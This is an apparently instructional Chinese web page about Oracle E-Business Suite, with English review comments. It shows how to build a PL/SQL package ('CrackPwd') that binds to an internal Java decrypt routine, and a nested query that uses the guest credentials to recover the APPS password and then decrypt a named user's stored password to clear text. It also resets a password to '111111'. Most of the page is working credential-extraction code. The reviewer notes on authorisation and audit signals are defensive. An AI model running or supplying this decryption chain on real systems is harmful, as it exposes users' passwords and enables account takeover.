我们知道,用户密码在后台是加密存储的,我们无法直接看到用户的明文密码,但可以将其解密(前提是密码采用可逆加密;若已启用不可逆的密码哈希,则无法解密)。
1、新建一个包
-- Package specification for a PL/SQL wrapper with a single function, getpwd,
-- that takes two strings and returns a string. The implementation is supplied
-- by the package body.
-- AUTHID CURRENT_USER gives the package invoker's rights: each call runs with
-- the privileges of the calling session, not those of the package owner.
-- NOTE(review): a helper of this kind turns stored credentials back into clear
-- text. Create it only for an authorised recovery, grant EXECUTE on it to no
-- other account, and drop the package as soon as the work is finished. DDL
-- auditing on the database is what surfaces objects like this one.
CREATE OR REPLACE PACKAGE CrackPwd
    AUTHID CURRENT_USER
IS
    -- orauser:    presumably the key material for the decryption (confirm
    --             against the bound Java method)
    -- appuserpwd: presumably the encrypted value to be decrypted
    FUNCTION getpwd (
        orauser    IN VARCHAR2,
        appuserpwd IN VARCHAR2
    )
        RETURN VARCHAR2;
END CrackPwd;
/
-- Package body: getpwd contains no PL/SQL logic. It is a Java call
-- specification that forwards both VARCHAR2 arguments to the static method
-- named in the NAME clause and returns that method's String result.
-- NOTE(review): the bound method is a decrypt routine, so this only yields a
-- password where the stored value is reversibly encrypted. Moving the
-- instance to non-reversible password hashing removes that possibility, and
-- a call specification bound to this method is worth alerting on when it
-- appears outside an approved change.
CREATE OR REPLACE PACKAGE BODY CrackPwd
IS
    FUNCTION getpwd (
        orauser    IN VARCHAR2,
        appuserpwd IN VARCHAR2
    )
        RETURN VARCHAR2
    IS
        LANGUAGE JAVA
        NAME 'oracle.apps.fnd.security.WebSessionManagerProc.decrypt(java.lang.String,java.lang.String) return java.lang.String';
END CrackPwd;
/
2、使用 SQL 查看用户的密码
-- Returns USER_NAME and the decrypted PASSWORD for the one FND_USER row named
-- in the final WHERE clause. The work is two nested calls to crackpwd.getpwd:
--   inner call: decrypts ENCRYPTED_FOUNDATION_PASSWORD of the guest account's
--               row, passing the full guest credential string as first argument
--   outer call: decrypts the target row's ENCRYPTED_USER_PASSWORD, passing the
--               inner call's result as first argument
-- The guest account's row is located by taking the part of
-- fnd_web_sec.get_guest_username_pwd that precedes the '/' character.
-- NOTE(review): the result set holds clear-text credentials, so keep it out of
-- spool files, screenshots and tickets. Reads of these two encrypted columns
-- from an ad-hoc session are a useful audit signal.
SELECT usr.user_name,
       crackpwd.getpwd (
           -- first argument: value produced by decrypting the foundation password
           (SELECT (SELECT crackpwd.getpwd (
                               fnd_web_sec.get_guest_username_pwd,
                               encrypted_foundation_password)
                      FROM dual) AS apps_password
              FROM fnd_user
             WHERE user_name =
                   -- guest user name, i.e. the text before the '/' separator
                   (SELECT SUBSTR (
                               fnd_web_sec.get_guest_username_pwd,
                               1,
                               INSTR (fnd_web_sec.get_guest_username_pwd, '/') - 1)
                      FROM dual)),
           -- second argument: the target user's stored encrypted password
           usr.encrypted_user_password
       ) AS password
  FROM fnd_user usr
 WHERE usr.user_name = 'S5M6238';
3、在后台修改用户密码
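-- Sets a new application password for user 'DA' by calling
-- fnd_web_sec.change_password once for each FND_USER row that matches the
-- WHERE clause. When no row matches, the function is not called and the query
-- returns no rows. The page states that a result of 'Y' means success.
-- Fix: the statement terminator was missing, unlike the query before it.
-- NOTE(review): '111111' is the page's example value and would not pass a
-- normal password policy. Because the new password is a literal in the SQL
-- text, it can end up in client history, trace files and the database cursor
-- cache. Prefer bind variables for both arguments where the client supports
-- them, and have the user change the password at next login.
select fnd_web_sec.change_password('DA', '111111')
  from fnd_user
 where user_name = 'DA';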
返回 'Y' 表示修改成功